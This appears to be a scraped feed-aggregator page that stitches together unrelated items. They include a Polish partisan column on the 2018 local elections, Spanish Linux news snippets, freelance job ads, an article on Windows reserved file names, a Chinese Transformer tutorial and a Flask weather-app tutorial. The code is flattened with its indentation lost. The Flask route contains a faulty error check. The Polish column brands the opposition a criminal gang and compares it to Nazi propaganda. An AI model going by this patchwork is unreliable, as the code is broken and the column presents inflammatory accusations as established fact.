Next Page: 10000

          FAŁSZYWE ELITY, ZACOFANA NOWOCZESNOŚĆ - KONTYNUACJA      Cache   Translate Page      

*

Mam projekt felietonu o kretyńskim odwróceniu spleśniałego ze starości garnituru na lewą stronę, zwaną "nowoczesnością". To jest temat rzeka, zastanawiam się nad wyborem niszczących argumentów, które mogą w bardzo prosty sposób udowodnić, że przezwisko "elita" pasuje totalitarnej opozycji jak pięść do nosa, a ta "nowoczesność" śmierdzi zgniłym śmietnikiem ideologicznych odpadów. Dowodów tego totalnego anachronizmu jest do obrzydzenia, jedna wielka ściema i totalny obciach.

Pierwszym argumentem przeciwko tym nowoczesnym elitom jest ich ideologiczny duch czasu, zaklęty w zaściankowej mentalności oraz przestarzałym sposobie rozumowania i działania. A wszystko co mają w głowie ma co najmniej trzysta lat i jest to niestety bardzo prymitywny bolszewizator. To jest umyślna DYWERSJA i SABOTAŻ [link].

Do niedzieli zbiorę kilka mocnych argumentów, które przedstawię albo tutaj albo w komentarzach. Mówiąc szczerze, niektórych argumentów sam się boję, ponieważ w tych mocno wątpliwych "elitach" widzę mnóstwo dość paskudnych właściwości. Na przykład pycha i pogarda. To jest katastrofalny duet - pycha jest źródłem pogardy, pogarda utwierdza pychę w chocholim tańcu nienawiści. Wystarczy przypomnieć prymitywny mechanizm wymyślony przez Adolfa Hitlera.

Mechanizm polegający na wykorzystaniu pychy niemieckich nadludzi (Übermensch), rozkręcanej pogardą do masy podludzi (Untermensch). To było prawdziwe źródło zbrodni, pasożytujące na najniższych ludzkich instynktach, działających jak koło zamachowe gromadzące całą energię ludzkiej nienawiści i pogardy, krok po kroku zbliżające ludzi do zbrodni, powiększające ludzką odporność na zło. Aby odpowiedzieć na proste pytanie gdzie to zło jest, konieczne jest wyjaśnienie czym są tak zwane wartości europejskie.

* * *

No i minęła niedziela 4 listopada 2018, czas irracjonalnej ciszy wyborczej, w którym trzeba było trzymać japę na kłódkę. Pisałem we wcześniejszym felietonie zatytułowanym "ANALIZA PRZEDWYBORCZA (19.10.18 - SZKIC)" o tym, że:

  • Strategia dobrej zmiany składa się z kwartetu czterech wyborów: samorządowych, unijnych, parlamentarnych i prezydenckich. Strategia jest z pozoru bardzo prosta. Najważniejsza akcja wyborcza rozegra się jesienią 2019 roku, a jej zasadniczym celem, decydującym dla przyszłości Polski jako państwa poważnego jest osiągnięcie parlamentarnej większości konstytucyjnej.
  • Aktualne wybory samorządowe są testem weryfikującym aktualny kontekst polityczny, co pozwoli na zrealizowanie szczegółowego programu działań, przygotowujących Polskę do późniejszych rozstrzygnięć."  

Tegoroczne wybory, razem z drugą turą są już za nami, ciszy już też nie słychać, możemy spokojnie mówić o wnioskach z pierwszego testu naszej wielkiej wyborczej triady. Nie kwartetu, lecz triady kończącej się na wyborach do Sejmu.

  1. Pierwszy wniosek: nigdy, przenigdy nie wolno ani ignorować ani lekceważyć siły ognia lewackiej międzynarodówki.
    To jest niestety na całym świecie stale powtarzany błąd prawicy pojawiający się we wszelkich rozgrywkach z najrozmaitszymi lewicami i lewactwami, polegający na podświadomym przyjmowaniu założenia o tym, że przeciwnik będzie trzymał się cywilizowanych standardów, a może nawet będzie działał uczciwie. 
    W rozgrywkach toczonych z wszelkimi lewicami jest to fatalne, wręcz samobójcze postępowanie. Dotyczy to nawet takiego politycznego autorytetu jak pani Angeli Merkel, która co najmniej kilka razy mówiła i obiecywała coś, a później robiła coś innego. [link: En passant, "Kulisy walki o władzę w CDU"]:
    "Było to jak mówił wtedy Merz, długo planowane oszustwo Angeli Merkel, niedotrzymanie danego słowa. W ten sposób pozbyła się ona wtedy najgroźniejszego przeciwnika."
  2. Drugi wniosek: polska totalitarna opozycja uczestniczy w regularnej wojnie przeciwko Polsce i jej fundamentalnym interesom. Jest to wojna w ekstremalnym stopniu wroga Polsce i angażujaca wszystkie dostępne i możliwe do zastosowania środki. Celem tej wojny jest zniszczenie nie tylko Niepodległości naszej Ojczyzny, ale likwidacji zdolności do samodzielnego i suwerennego bytu Państwa Polskiego. To jest DYWERSJA i SABOTAŻ [link]. Ten wniosek wymaga oczywiście bezspornego dowodu. Tutaj jest chyba tylko miejsce na lakoniczne wskazanie kierunków postępowania dowodowego. I zrobię to, nie wiem jeszcze czy w tym miejscu, czy chwilę później w dalszej części.
  3. Trzeci wniosek: co prawda "Jeszcze Polska nie zginęła, Kiedy my żyjemy." ale jeżeli teraz nie zrealizujemy programu naprawy Rzeczypospolitej Polskiej, to bardzo jest możliwe, że na wiele pokoleń, a może nawet na zawsze stracimy szansę na dalszy suwerenny byt naszej Ojczyzny.  Ten wniosek może być jasno uzasadniony oczywistym celem ich agresji. Jest to zarazem najbardziej konsekwentnie i nieustannie przez ostatnie sto lat realizowany cel wrogów Polski, Polaków i suwerennego bytu Państwa Polskiego. Póki u władzy była dzisiejsza totalna opozycja, to funkcjonariusze tej władzy pałami tłukli świetujacych dzień 11 listopada. Dzisiaj, kiedy władza wymyka się z ich rak, nadal nie cofają się przed żadną obelgą, przed żadną zniewagą obchodów naszego święta Narodowego. Słów brakuje, ponieważ jest to pogarda i nienawiść jawnie okazywana polskiej Niepodległości w warstwie symbolicznej.
  4. Czwarty wniosek: Nienawiść i pogarda okazywana jest Polsce i polskiej Niepodległości nie tylko w warstwie symbolicznej ale i w warstwie faktycznej - ponieważ akcja antypolskiej totalitarnej opozycji polegająca na pozatraktatowym wykorzystaniu TSUE do złamania polskiej Niepodległości, jest jawnym i jednym z wielu bezpośrednich dowodów działania w celu zrealizowania zamiaru pozbawienia Polski suwerennego bytu - wbrew obowiązującym zapisom Traktatu o Unii Europejskiej. To trzeba powiedzieć jasno i jednoznacznie. A nie jest to tylko jeden przykład konkretnego działania wymierzonego przeciwko żywotnym interesom Polski - [link].
  5. Piąty wniosek: Napisałem wyżej i powtórzę jeszcze raz - totalitarna opozycja posługuje się w niszczeniu polskiej Niepodległości prymitywnym mechanizmem czarnej propagandy, skutecznie stosowanym kiedyś przez Adolfa Hitlera i Josepha Goebbelsa, polegającym na wykorzystaniu pychy polskich fałszywych elit jako nadludzi (Übermensch) nakręcanych pogardą a nawet nienawiścią do nas do Polaków, do naszej wiary, kultury i historii oraz do Kościoła Katolickiego - jako masy podludzi (Untermensch). 
  6. Szósty wniosek: Wynik testu wyborów samorządowych pokazuje, że masywny strumień wrogiej antypolskiej propagandy jest skuteczny, mimo swojego prymitywu oraz mimo faktycznych osiągnięć polityki społecznej i ekonomicznej rządu "dobrej zmiany", a nawet mimo ujawnienia faktów działania antypolskiej złodziejskiej mafii. Świadczą o tym wyniki wyborów samorządowych w wielkich polskich miastach. A więc "nie wystarczy nie kraść".
  7. Siódmy wniosek: Twierdzenie o zwycięstwie PiS w tym wyborczym teście jest po prostu "niezupełnie nieprawdziwy". Otrzymaliśmy najwięcej głosów, czyli odnieśliśmy arytmetyczną przewagę nad licznymi ugrupowaniami antypisu, które działając w koalicji mają jednak liczebną przewagę. Można więc twierdzić, że osiągnęliśmy znaczny postęp w porównaniu z poprzednimi wyborami samorzadowymi, ale chamówa totalitarnej propagandy jest nadal niebezpieczna dla polskiej przyszłości.
  8. Ósmy wniosek: Musimy skoncentrować strategię długiej akcji przygotowania wyborów do Parlamentu Europejskiego oraz Polskiego Sejmu na zasadzie zdecydowanego stanięcia w prawdzie w celu wyeliminowania totalitarnej i zarazem prymitywnej grabieży polskiego majątku narodowego, skończenia z bezczelnym okradaniem nas wszystkich przez lokalne i centralne sitwy, układy, mafie i oligarchie - koniec z wrogim przejęciem Polski przez komunistyczną mafię. Zdecydowane stanięcie w prawdzie. musi doprowadzić do zupełnej publicznej kompromitacji i wykluczenia złodziejstwa z ich obecności w polskim życiu publicznym.
  9. Dziewiąty wniosek: prawdziwym celem totalitarnej opozycji jest ekonomiczna grabież i tylko tyle i nic więcej. Ich cel jest tylko i wyłącznie ekonomiczny. Chodzi o utrzymanie i ochronę ich prawa do ekonomicznej eksploatacji wszelkich polskich aktywów pod ochroną prawa polskiego i międzynarodowego. Stan polskiej rzeczywistości można więc zdefiniować mniej więcej tak:
    Zorganizowana przez komunistów grupa przestępcza, zgodnie z porozumieniem w Magdalence dokonała w roku 1989 wrogiego przejęcia polskiej państwowości. Zorganizowana grupa przestępcza złożona z ludzi interesu, świadomie i celowo realizuje plan zniszczenia systemów etycznych i społeczno-politycznych w państwie polskim, dążąc do utrzymania wrogiego przejęcia władzy politycznej, w stopniu umożliwiającym trwałą degenerację prawa państwowego, w sposób zapewniający tej grupie przejęcie kontroli nad gospodarką, w celu długotrwałej pasożytniczej eksploatacji jej zasobów materialnych i ludzkich, pod ochroną prawa państwowego i międzynarodowego. Ten cel zorganizowana grupa przestępcza realizuje wszelkimi dostępnymi, nawet zbrodniczymi środkami.
    Jest to więc klasyczna kontynuacja komunistycznej agresji przeciwko Polsce. Dodatkowe WYJAŚNIENIE podam w komentarzu.
  10. Dziesiąty ostatni wniosek: warunkiem koniecznym, potrzebnym do zapewnienia naszego, polskiego sukcesu w triadzie wyborczej jest totalne polityczne obezwładnienie antypolskiej pasożytniczej partii w jej międzynarodowym środowisku, jeśli mamy ustawić sprzyjające Polsce warunki w zarówno przestrzeni międzynarodowej jak i wewnętrznej. Zakładam, że nie muszę teraz konkretnie wskazywać narzędzi, które muszą być niezawodnymi młotami eliminującymi ultra totalitarną antypolską partię. Pisałem o tym kiedyś ("OSTATNIE OSTRZEŻENIE" [link]). Czeka ich infamia. Nawet żaden kot nie będzie chciał wysikać się do ich kuwety [link]. Pisałem o tym także po pierwszej turze wyborów "ANALIZA POWYBORCZA (21.10.18 - KOMENTARZ)" [link]

 

A o wartościach europejskich można było poważnie rozmawiać, trzeba brać pod uwagę równocześnie dwa artykuły Traktatu Unii Europejskiej (Art. 2 TUE - Główne wartości Unii [link] oraz Art. 5 TUE - Granice kompetencji Unii [link]).


          Linux 5 llegará a principios de 2019      Cache   Translate Page      

Por si alguien no se ha enterado, hace un par de semanas que Linus Torvalds volvió a sus labores al frente de Linux y en ello está, coordinando el desarrollo de la próxima versión del kernel, después de que Greg Kroah-Hartman se encargase de lanzar Linux 4.19 LTS . ¿Cuál será esa versión, preguntas? Linux […]

La entrada Linux 5 llegará a principios de 2019 se publicó primero en MuyComputer.


          Apple bloquea el arranque de Linux con el chip de seguridad T2      Cache   Translate Page      

El chip de seguridad T2 instalado en el nuevo Mac mini bloquea el arranque de distribuciones GNU/Linux, según explican en phoronix. Los MacBook Pro de Apple se han ido volviendo más hostiles con Linux en los últimos años, mientras que los Mac Mini anteriores generalmente han funcionado bien con la mayoría de distribuciones de Linux debido a […]

La entrada Apple bloquea el arranque de Linux con el chip de seguridad T2 se publicó primero en MuyComputer.


          Re: Ipad Pro keyboard problem with Amazon Linux Workspaces      Cache   Translate Page      
Hi, I am having a similar issue.
...
          Trying to install MongoDB PHP Driver in Elastic Beanstalk Amazon Linux      Cache   Translate Page      
Trying to install MongoDB PHP Driver in Elastic Beanstalk running Amazon Linux. Have already created a config file in the .ebextensions folder with the following code:
...
          WHMCS Module Development - 2      Cache   Translate Page      
We are looking for a WHMCS Module developer to drive forward future versions of our WHMCS module. This work is regular, we aim to release new versions every three months and the successful person will have the option to complete all of the future work on the module... (Budget: £5 - £10 GBP, Jobs: HTML, Linux, MySQL, PHP, WHMCS)
          script to update ldap      Cache   Translate Page      
I have an olive oil society The script (ideally in powershell or python) can import a .ldif file in ldap (Apache Directory Studio 2.0) It should be at the output of the script a log of success or error... (Budget: €250 - €750 EUR, Jobs: Linux, Powershell, Python, Shell Script, Windows Server)
          IBM-Red Hat: Get Open Source Training to Prepare for Acquisition      Cache   Translate Page      
With IBM's Red Hat acquisition announcement still fresh, now's the time for the channel to be sure its people are trained in Linux and open source.
          Más antiguo que Star Wars: el bug de Windows que lleva más de 40 años sin solucionarse       Cache   Translate Page      

Más antiguo que Star Wars: el bug de Windows que lleva más de 40 años sin solucionarse #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Los bugs son tan antiguos como la informática o la programación, y prácticamente ningún sistema operativo, firmware o software que potenciara a dispositivos ha estado exento de ellos. En ese sentido, muchos nacen y permanecen en los equipos durante años sin que nadie los perciba, mientras que otros llegan a causa de limitaciones o hacks del momento en que se escribe el código.

@Foone, un usuario de Twitter, ha contado la historia de un bug nacido en 1974 y que aún permanece en Windows 10, como consecuencia de contar en su interior con la base del CP/M de Gary Kildall y el Q-DOS de Tim Paterson. Mientras intentaba copiar el archivo ‘aux.h’, el sistema lanzó un error anunciando que "el fichero AUX.H es demasiado grande para el sistema de archivos de destino". Todo ello, pese a contar sólo con 9,57 kilobytes. Es muy poco desde la perspectiva actual, pero mucho para la época.

Un bug eterno, en aras de la compatibilidad

El origen del problema está en los archivos especiales presentes en carpetas especiales de Unix. En el viejo sistema, según @Foone, "todo era un archivo", algo que Kildall llevó a CP/M en 1974. Sin embargo, al estar CP/M diseñado para ordenador de 8-bit, con muy poco memoria, sin discos duros, no se usaban directorios, sino distintos discos. Al no haber directorios, los ficheros están en todo el disco. Así, según el ejemplo,para imprimir un archivo había que ejecutar "PIP LST:=FOO.TXT", que lo que hace es copiar FOO.TXT al archivo LST, la impresora. Toda referencia a un archivo de impresora o teclado podía adquirir su extensión, por lo que LST.TXT seguía funcionando como impresora.

Todo esto también existió en Q-DOS y PC-DOS, y para no romper la compatibilidad con versiones antiguas del sistema, los archivos especiales estarían ahora en todos los directorios con todas las extensiones. Así fue en Windows 95, basado en DOS. Luego la base fue Windows NT, que llega hasta estos días, y que en XP, de nuevo para garantizar compatibilidad, hizo uso del antiguo sistema de DOS.

Así, en Windows 10, por ejemplo, no es posible crear un archivo .txt que haga referencia a hardware: CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9. Microsoft lo recoge aquí.

En Windows 95, de hecho, como @Foone cuenta, acceder a "C:\con\con" producía una BSOD de forma automática. En cualquier caso, hay debate sobre si es un bug o no. En este caso, hablamos de un bug a día de hoy, porque ya no usamos el hardware de esa forma, pero no en su momento, cuando tenía bastante sentido.


          System76: компьютеры Thelio с Linux красивые и мощные      Cache   Translate Page      

Компания System76 является самым известным игроком среди производителей ПК с альтернативными Windows системами. Основная ниша производителя, это ноутбуки и настольные системы, работающие на Linux. И эти компьютеры вовсе не поделка кустарных мастеров, они соответствуют всем современным стандартам потребительского рынка, как в плане оснащения, так и в плане юзабельности для конечного пользователя. Дизайн Новая же линейка […]

Запись System76: компьютеры Thelio с Linux красивые и мощные впервые появилась ОКомпах.ру.


          赛尔译文 | Transformer注解及PyTorch实现(上)      Cache   Translate Page      

原文:http://nlp.seas.harvard.edu/2018/04/03/attention.html

作者:Alexander Rush

译者:哈工大SCIR 赵正宇

转载需注明出处:哈工大SCIR


赛尔译文 | Transformer注解及PyTorch实现(上)
"Attention is All You Need"[1] 一文中提出的Transformer网络结构最近引起了很多人的关注。Transformer不仅能够明显地提升翻译质量,还为许多NLP任务提供了新的结构。虽然原文写得很清楚,但实际上大家普遍反映很难正确地实现。

所以我们为此文章写了篇注解文档,并给出了一行行实现的Transformer的代码。本文档删除了原文的一些章节并进行了重新排序,并在整个文章中加入了相应的注解。此外,本文档以Jupyter notebook的形式完成,本身就是直接可以运行的代码实现,总共有400行库代码,在4个GPU上每秒可以处理27,000个tokens。

想要运行此工作,首先需要安装PyTorch[2]。这篇文档完整的notebook文件及依赖可在github[3] 或 Google Colab[4]上找到。 需要注意的是,此注解文档和代码仅作为研究人员和开发者的入门版教程。这里提供的代码主要依赖OpenNMT[5]实现,想了解更多关于此模型的其他实现版本可以查看Tensor2Tensor[6] (tensorflow版本) 和 Sockeye[7](mxnet版本) Alexander Rush (@harvardnlp[8] or srush@seas.harvard.edu) 准备工作 # !pip install http://download.pytorch.org/whl/cu80/torch-0.3.0.post4-cp36-cp36m-linux_x86_64.whl numpy matplotlib spacy torchtext seaborn import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import math, copy, time from torch.autograd import Variable import matplotlib.pyplot as plt import seaborn seaborn.set_context(context="talk") %matplotlib inline

内容目录

准备工作

背景

模型结构

- Encoder和Decoder

- Encoder

- Decoder

- Attention

- Attention在模型中的应用

- Position-wise前馈网络

- Embedding和Softmax

- 位置编码

- 完整模型

(由于原文篇幅过长,其余部分在下篇)

训练

- 批和掩码

- 训练循环

- 训练数据和批处理

- 硬件和训练进度

-优化器

-正则化

- 标签平滑

第一个例子

- 数据生成

- 损失计算

- 贪心解码

真实示例

- 数据加载

- 迭代器

- 多GPU训练

- 训练系统附加组件:BPE,搜索,平均

结果

- 注意力可视化

结论

本文注解部分都是以引用的形式给出的,主要内容都是来自原文。

背景

减少序列处理任务的计算量是一个很重要的问题,也是Extended Neural GPU、ByteNet和ConvS2S等网络的动机。上面提到的这些网络都以CNN为基础,并行计算所有输入和输出位置的隐藏表示。 在这些模型中,关联来自两个任意输入或输出位置的信号所需的操作数随位置间的距离增长而增长,比如ConvS2S呈线性增长,ByteNet呈现以对数形式增长,这会使学习较远距离的两个位置之间的依赖关系变得更加困难。而在Transformer中,操作次数则被减少到了常数级别。

Self-attention有时候也被称为Intra-attention,是在单个句子不同位置上做的Attention,并得到序列的一个表示。它能够很好地应用到很多任务中,包括阅读理解、摘要、文本蕴涵,以及独立于任务的句子表示。端到端的网络一般都是基于循环注意力机制而不是序列对齐循环,并且已经有证据表明在简单语言问答和语言建模任务上表现很好。

据我们所知,Transformer是第一个完全依靠Self-attention而不使用序列对齐的RNN或卷积的方式来计算输入输出表示的转换模型。

模型结构 目前大部分比较热门的神经序列转换模型都有Encoder-Decoder结构[9]。Encoder将输入序列
赛尔译文 | Transformer注解及PyTorch实现(上)
映射到一个连续表示序列
赛尔译文 | Transformer注解及PyTorch实现(上)
。对于编码得到的,Decoder每次解码生成一个符号,直到生成完整的输出序列:
赛尔译文 | Transformer注解及PyTorch实现(上)
。对于每一步解码,模型都是自回归的[10],即在生成下一个符号时将先前生成的符号作为附加输入。 class EncoderDecoder(nn.Module): """ A standard Encoder-Decoder architecture. Base for this and many other models. """ def __init__(self, encoder, decoder, src_embed, tgt_embed, generator): super(EncoderDecoder, self).__init__() self.encoder = encoder self.decoder = decoder self.src_embed = src_embed self.tgt_embed = tgt_embed self.generator = generator def forward(self, src, tgt, src_mask, tgt_mask): "Take in and process masked src and target sequences." return self.decode(self.encode(src, src_mask), src_mask, tgt, tgt_mask) def encode(self, src, src_mask): return self.encoder(self.src_embed(src), src_mask) def decode(self, memory, src_mask, tgt, tgt_mask): return self.decoder(self.tgt_embed(tgt), memory, src_mask, tgt_mask) class Generator(nn.Module): "Define standard linear + softmax generation step." def __init__(self, d_model, vocab): super(Generator, self).__init__() self.proj = nn.Linear(d_model, vocab) def forward(self, x): return F.log_softmax(self.proj(x), dim=-1)

Transformer的整体结构如下图所示,在Encoder和Decoder中都使用了Self-attention, Point-wise和全连接层。Encoder和decoder的大致结构分别如下图的左半部分和右半部分所示。


赛尔译文 | Transformer注解及PyTorch实现(上)
Encoder和Decoder Encoder

Encoder由N=6个相同的层组成。

def clones(module, N): "Produce N identical layers." return nn.ModuleList([copy.deepcopy(module) for _ in range(N)]) class Encoder(nn.Module): "Core encoder is a stack of N layers" def __init__(self, layer, N): super(Encoder, self).__init__() self.layers = clones(layer, N) self.norm = LayerNorm(layer.size) def forward(self, x, mask): "Pass the input (and mask) through each layer in turn." for layer in self.layers: x = layer(x, mask) return self.norm(x) 我们在每两个子层之间都使用了残差连接(Residual Connection) [11]和归一化 [12]。 class LayerNorm(nn.Module): "Construct a layernorm module (See citation for details)." def __init__(self, features, eps=1e-6): super(LayerNorm, self).__init__() self.a_2 = nn.Parameter(torch.ones(features)) self.b_2 = nn.Parameter(torch.zeros(features)) self.eps = eps def forward(self, x): mean = x.mean(-1, keepdim=True) std = x.std(-1, keepdim=True) return self.a_2 * (x - mean) / (std + self.eps) + self.b_2 也就是说,每个子层的输出为
赛尔译文 | Transformer注解及PyTorch实现(上)
,其中
赛尔译文 | Transformer注解及PyTorch实现(上)
是由子层自动实现的函数。我们在每个子层的输出上使用Dropout,然后将其添加到下一子层的输入并进行归一化。 为了能方便地使用这些残差连接,模型中所有的子层和Embedding层的输出都设定成了相同的维度,即
赛尔译文 | Transformer注解及PyTorch实现(上)

class SublayerConnection(nn.Module):

"""

A residual connection followed by a layer norm.

Note for code simplicity the norm is first as opposed to last.

"""

def __init__(self, size, dropout):

super(SublayerConnection, self).__init__()

self.norm = LayerNorm(size)

self.dropout = nn.Dropout(dropout)

def forward(self, x, sublayer):

"Apply residual connection to any sublayer with the same size."

return x + self.dropout(sublayer(self.norm(x)))

每层都有两个子层组成。第一个子层实现了“多头”的Self-attention,第二个子层则是一个简单的Position-wise的全连接前馈网络。

class EncoderLayer(nn.Module): "Encoder is made up of self-attn and feed forward (defined below)" def __init__(self, size, self_attn, feed_forward, dropout): super(EncoderLayer, self).__init__() self.self_attn = self_attn self.feed_forward = feed_forward self.sublayer = clones(SublayerConnection(size, dropout), 2) self.size = size def forward(self, x, mask): "Follow Figure 1 (left) for connections." x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask)) return self.sublayer[1](x, self.feed_forward) Decoder

Decoder也是由N=6个相同层组成。

class Decoder(nn.Module): "Generic N layer decoder with masking." def __init__(self,
          How to build a web app using Python’s Flask and Google App Engine      Cache   Translate Page      

How to build a web app using Python’s Flask and Google App Engine

If you want to build web apps in a very short amount of time using python, then Flask is a fantastic option.

Flask is a small and powerful web framework (also known as “ microframework ”). It is also very easy to learn and simple to code. Based on my personal experience, it was easy to start as a beginner.

Before this project, my knowledge of Python was mostly limited to Data Science. Yet, I was able to build this app and create this tutorial in just a few hours.

In this tutorial, I’ll show you how to build a simple weather app with some dynamic content using an API. This tutorial is a great starting point for beginners. You will learn to build dynamic content from APIs and deploying it on Google Cloud.

The end product can be viewed here .


How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine

To create a weather app, we will need to request an API key from Open Weather Map . The free version allows up to 60 calls per minute, which is more than enough for this app. The Open Weather Map conditions icons are not very pretty. We will replace them with some of the 200+ weather icons from Erik Flowers instead.


How to build a web app using Python’s Flask and Google App Engine

This tutorial will also cover: (1) basic CSS design, (2) basic HTML with Jinja, and (3) deploying a Flask app on Google Cloud.

The steps we’ll take are listed below:

Step 0: Installing Flask (this tutorial doesn’t cover Python and PIP installation) Step 1: Building the App structure Step 2: Creating the Main App code with the API request Step 3: Creating the 2 pages for the App (Main and Result) with Jinja , HTML, and CSS Step 4: Deploying and testing on your local laptop Step 5: Deploying on Google Cloud. Step 0 ― Installing Flask and the libraries we will use in a virtual environment.

We’ll build this project using a virtual environment. But why do we need one?

With virtual environments, you create a local environment specific for each projects. You can choose libraries you want to use without impacting your laptop environment. As you code more projects on your laptop, each project will need different libraries. With a different virtual environment for each project, you won’t have conflicts between your system and your projects or between projects.

Run Command Prompt (cmd.exe) with administrator privileges. Not using admin privileges will prevent you from using pip.
How to build a web app using Python’s Flask and Google App Engine
(Optional) Install virtualenv and virtualenvwrapper-win with PIP. If you already have these system libraries, please jump to the next step. #Optional pip install virtualenvwrapper-win pip install virtualenv
How to build a web app using Python’s Flask and Google App Engine
Create your folder with the name “WeatherApp” and make a virtual environment with the name “venv” (it can take a bit of time) #Mandatory mkdir WeatherApp cd WeatherApp virtualenv venv
How to build a web app using Python’s Flask and Google App Engine
Activate your virtual environment with “call” on windows (same as “source” for linux). This step changes your environment from the system to the project local environment. call venv\Scripts\activate.bat
How to build a web app using Python’s Flask and Google App Engine
Create a requirements.txt file that includes Flask and the other libraries we will need in your WeatherApp folder, then save the file. The requirements file is a great tool to also keep track of the libraries you are using in your project. Flask==0.12.3
click==6.7
gunicorn==19.7.1
itsdangerous==0.24
Jinja2==2.9.6
MarkupSafe==1.0
pytz==2017.2
requests==2.13.0
Werkzeug==0.12.1
How to build a web app using Python’s Flask and Google App Engine
Install the requirements and their dependencies. You are now ready to build your WeatherApp. This is the final step to create your local environment. pip install -r requirements.txt
How to build a web app using Python’s Flask and Google App Engine
Step 1 ― Building the App structure

You have taken care of the local environment. You can now focus on developing your application. This step is to make sure the proper folder and file structure is in place. The next step will take care of the backend code.

Create two Python files (main.py, weather.py) and two folders (static with a subfolder img, templates).
How to build a web app using Python’s Flask and Google App Engine
Step 2 ― Creating the Main App code with the API request (Backend)

With the structure set up, you can start coding the backend of your application. Flask’s “Hello world” example only uses one Python file. This tutorial uses two files to get you comfortable with importing functions to your main app.

The main.py is the server that routes the user to the homepage and to the result page. The weather.py file creates a function with API that retrieves the weather data based on the city selected. The function populates the resulting page.

Edit main.py with the following code and save #!/usr/bin/env python from pprint import pprint as pp from flask import Flask, flash, redirect, render_template, request, url_for from weather import query_api app = Flask(__name__) @app.route('/')
def index():
return render_template(
'weather.html',
data=[{'name':'Toronto'}, {'name':'Montreal'}, {'name':'Calgary'},
{'name':'Ottawa'}, {'name':'Edmonton'}, {'name':'Mississauga'},
{'name':'Winnipeg'}, {'name':'Vancouver'}, {'name':'Brampton'},
{'name':'Quebec'}]) @app.route("/result" , methods=['GET', 'POST'])
def result():
data = []
error = None
select = request.form.get('comp_select')
resp = query_api(select)
pp(resp)
if resp:
data.append(resp)
if len(data) != 2:
error = 'Bad Response from Weather API'
return render_template(
'result.html',
data=data,
error=error) if __name__=='__main__': app.run(debug=True) Request a free API key on Open Weather Map
How to build a web app using Python’s Flask and Google App Engine
Edit weather.py with the following code (updating the API_KEY) and save from datetime import datetime
import os
import pytz
import requests
import math
API_KEY = 'XXXXXXXXXXXXXXXXXXXXXXXXXXX'
API_URL = ('http://api.openweathermap.org/data/2.5/weather?q={}&mode=json&units=metric&appid={}') def query_api(city): try: print(API_URL.format(city, API_KEY)) data = requests.get(API_URL.format(city, API_KEY)).json() except Exception as exc: print(exc) data = None return data Step 3 ― Creating pages with Jinja , HTML, and CSS (Frontend)

This step is about creating what the user will see.

The HTML pages weather and result are the one the backend main.py will route to and give the visual structure. The CSS file will bring the final touch. There is no javascript in this tutorial (the front end is pure HTML and CSS).

It was my first time using the Jinja2 template library to populate the HTML file. It surprised me how easy it was to bring dynamic images or use functions (e.g. rounding weather). Definitely a fantastic template engine.

Create the first HTML file in the templates folder (weather.html) <!doctype html> <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='style.css') }}"> <div class="center-on-page"> <h1>Weather in a City</h1> <form class="form-inline" method="POST" action="{{ url_for('result') }}"> <div class="select"> <select name="comp_select" class="selectpicker form-control"> {% for o in data %} <option value="{{ o.name }}">{{ o.name }}</option> {% endfor %} </select> </div> <button type="submit" class="btn">Go</button> </form> Create the second HTML file in the templates folder (result.html) <!doctype html> <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='style.css') }}"> <div class="center-on-page"> {% for d in data %} {% set my_string = "static/img/" + d['weather'][0]['icon']+ ".svg" %} <h1> <img src="{{ my_string }}" class="svg" fill="white" height="100" vertical-align="middle" width="100"> </h1> <h1>Weather</h1> <h1>{{ d['name'] }}, {{ d['sys']['country'] }}</h1> <h1>{{ d['main']['temp']|round|int}} °C</h1> {% endfor %}
How to build a web app using Python’s Flask and Google App Engine
Add a CSS file in the static folder (style.css) body { color: #161616; font-family: 'Roboto', sans-serif; text-align: center; background-color: currentColor; } .center-on-page { position: absolute; top:50%; left: 50%; transform: translate(-50%,-50%); } h1 { text-align: center; color:#FFFFFF; } img { vertical-align: middle; } /* Reset Select */ select { -webkit-appearance: none; -moz-appearance: none; -ms-appearance: none; appearance: none; outline: 0; box-shadow: none; border: 0 !important; background: #2c3e50; background-image: none; } /* Custom Select */ .select { position: relative; display: block; width: 20em; height: 3em; line-height: 3; background: #2c3e50; overflow: hidden; border-radius: .25em; } select { width: 100%; height: 100%; margin: 0; padding: 0 0 0 .5em; color: #fff; cursor: pointer; } select::-ms-expand { display: none; } /* Arrow */ .select::after { content: '\25BC'; position: absolute; top: 0; right: 0; bottom: 0; padding: 0 1em; background: #34495e; pointer-events: none; } /* Transition */ .select:hover::after { color: #f39c12; } .select::after { -webkit-transition: .25s all ease; -o-transition: .25s all ease; transition: .25s all ease; } button{ -webkit-appearance: none; -moz-appearance: none; -ms-appearance: none; appearance: none; outline: 0; box-shadow: none; border: 0 !important; background: #2c3e50; background-image: none; width: 100%; height: 40px; margin: 0; margin-top: 20px; color: #fff; cursor: pointer; border-radius: .25em; } .button:hover{ color: #f39c12; } Download the images in the img subfolder in static

Link with the images on Github :


How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Step 4 ― Deploying and testinglocally

At this stage, you have set up the environment, the structure, the backend, and the frontend. The only thing left is to launch your app and to enjoy it on your localhost.

Just launch the main.py with Python python main.py Go to the localhost link proposed on cmd with your Web Browser (Chrome, Mozilla, etc.). You should see your new weather app live on your local laptop:)
How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Step 5 ― Deploying on GoogleCloud

This last step is for sharing your app with the world. It’s important to note that there are plenty of providers for web apps built using Flask. Google Cloud is just one of many. This article does not cover some of the others like AWS, Azure, Heroku…

If the community is interested, I can provide the steps of the other cloud providers in another article and some comparison (pricing, limitations, etc.).

To deploy your app on Google Cloud you will need to 1) Install the SDK, 2) Create a new project, 3) Create 3 local files, 4) Deploy and test online.

Install the SDK following Google’s instructions Connect to your Google Cloud Account (use a $300 coupon if you haven’t already) Create a new project and save the project id (wait a bit until the new project is provisioned)
How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
